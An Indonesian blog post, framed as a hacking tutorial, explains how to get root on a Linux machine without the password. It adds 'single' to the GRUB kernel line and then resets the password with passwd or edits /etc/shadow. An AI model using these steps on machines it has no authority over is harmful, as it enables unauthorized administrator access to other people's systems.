<p>    Hi, ketemu lagi dengan saya, sikeren Al-k. <img src='http://www.ilmuwebsite.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' title="Jadi root di linux tanpa password tutorial hacking web desain grafis" /> <br />    Sama seperti sebelum sebelumnya, yaitu artikel mengenai jebol password, <br />    tapi kali ini saya akan menjelaskannya pada Linux. <br />    Mungkin pada artikel yang lain telah di jelaskan bagaimana <br />    cara melakukan login tanpa password dengan bootloader Lilo,<br />    tapi kali ini saya akan menjelaskannya pada bootloader Grub.</p>
<p><span id="more-608"></span><br /><span style="font-weight: bold">    Beginilah caranya &#8230;</span></p>
<p>    1.) Defaultnya, pas di bootloader grub ada 2 pilihan yaitu Redhat Linux dan DOS.<br />         Pilih, yang Redhat Linux, terus tekan e di keyboard.<br />         Tombol e berguna untuk melakukan edit.</p>
<p>    2.) http://h1.ripway.com/alk/grub.png<br />         setelah itu, pilih bagian ke 2 atau 3, disitu tertulis kernel blablablablaba &#8230;<br />         tekan e dikeyboard</p>
<p>    3.) Kemudian tambahkan s atau single dibelakangnya, kira kira seperti ini</p>
<p><span style="font-weight: bold">         kernel /boot/vmlinuz-2.6.15-1-686 root=/dev/sda1 ro single</p>
<p></span>         setelah itu Escape.</p>
<p>    4.) Masih dalam keadaan memilih kernel, kemudian tekan b di keyboard untuk Boot. anda akan di bawa   <br />         pada kedudukan root. Silahkan ketik passwd untuk mengganti password yang baru  atau anda bisa <br />         mengedit file /etc/shadow, untuk menghilangkan password pada root.</p>
<p>         Jreng jreng jreng &#8230; satu lagi, anda login sebagai administrator tanpa password</p>
<p style="margin-bottom: 0cm" align="justify"><font size="2" color="#000000"><font face="Verdana, sans-serif"><u><strong>// Greetz :</strong></u></font></font></p>
<p style="margin-bottom: 0cm" align="justify"><font size="2" color="#000000"><font face="Verdana, sans-serif">- Fel_c, Mentari^, BLACK.SCORPIO, Zahra_Fakhrunisa, Lady_Sizuka, Upie, Ipank<br />- Allguys in #khilafah, http://www.jcunited.tk</font></font></p>
 ]]></content:encoded>
			<wfw:commentRss>http://www.ilmuwebsite.com/tutorial-hacking/jadi-root-di-linux-tanpa-password/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
